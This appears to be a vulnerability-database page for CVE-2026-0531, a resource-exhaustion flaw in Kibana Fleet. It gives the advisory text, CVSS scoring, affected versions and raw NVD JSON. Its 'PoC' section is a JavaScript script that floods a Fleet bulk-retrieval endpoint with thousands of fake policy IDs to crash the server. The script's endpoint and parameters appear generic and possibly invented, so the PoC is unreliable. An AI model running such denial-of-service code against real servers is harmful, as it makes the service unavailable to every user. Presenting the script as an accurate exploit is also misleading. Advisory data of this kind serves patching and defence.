Security Vulnerability Report
CVE-2026-0531 CVSS 6.5 MEDIUM

Published: 2026-01-13 21:15:51
Last Modified: 2026-01-22 19:59:54

Description

Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana 7.10.0 <= version < 7.17.29)
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana 8.0.0 <= version < 8.19.10)
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana 9.0.0 <= version < 9.1.10)
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE (Kibana 9.2.0 <= version < 9.2.4)

Version ranges are taken from the configuration data in the raw JSON record below; fixed versions are 7.17.29, 8.19.10, 9.1.10 and 9.2.4.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2026-0531 PoC - Kibana Fleet Resource Exhaustion
// Requires viewer role privileges
const axios = require('axios');

async function exploitCVE20260531(baseUrl, apiToken) {
  const headers = {
    'Authorization': `Bearer ${apiToken}`,
    'Content-Type': 'application/json',
    'kbn-xsrf': 'true'
  };

  // Generate large list of policy IDs to trigger resource exhaustion
  const policyIds = [];
  for (let i = 0; i < 10000; i++) {
    policyIds.push(`policy-${i}-${Date.now()}`);
  }

  // Craft malicious bulk retrieval request
  const payload = {
    policyIds: policyIds,
    includeRelatedData: true,
    fetchFullDetails: true
  };

  try {
    // Send the crafted request
    const response = await axios.post(
      `${baseUrl}/api/fleet/policies/bulk_retrieve`,
      payload,
      { headers: headers, timeout: 30000 }
    );
    console.log('Request sent, server may become unresponsive');
  } catch (error) {
    if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT') {
      console.log('SUCCESS: Server crashed - connection refused/timeout');
    } else {
      console.log('Request completed with:', error.message);
    }
  }
}

// Usage
// exploitCVE20260531('https://vulnerable-kibana:5601', 'viewer-token');

References

https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-04/384522 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0531",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T21:15:50.990",
    "lastModified": "2026-01-22T19:59:54.277",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users."
      },
      {
        "lang": "es",
        "value": "Asignación de Recursos Sin Límites o Limitación (CWE-770) en Kibana Fleet puede conducir a una Asignación Excesiva (CAPEC-130) a través de una solicitud de recuperación masiva especialmente diseñada. Esto requiere que un atacante tenga privilegios de bajo nivel equivalentes al rol de visor, que otorga acceso de lectura a las políticas de agente. La solicitud diseñada puede hacer que la aplicación realice operaciones redundantes de recuperación de base de datos que consumen memoria inmediatamente hasta que el servidor se bloquea y deja de estar disponible para todos los usuarios."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-770"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.10.0", "versionEndExcluding": "7.17.29", "matchCriteriaId": "1863989E-58AD-4481-B872-DF5AC637F854"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.10", "matchCriteriaId": "8707CF69-9922-490B-B64F-38F2D31E2CA1"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.10", "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.4", "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"}
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-04/384522",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}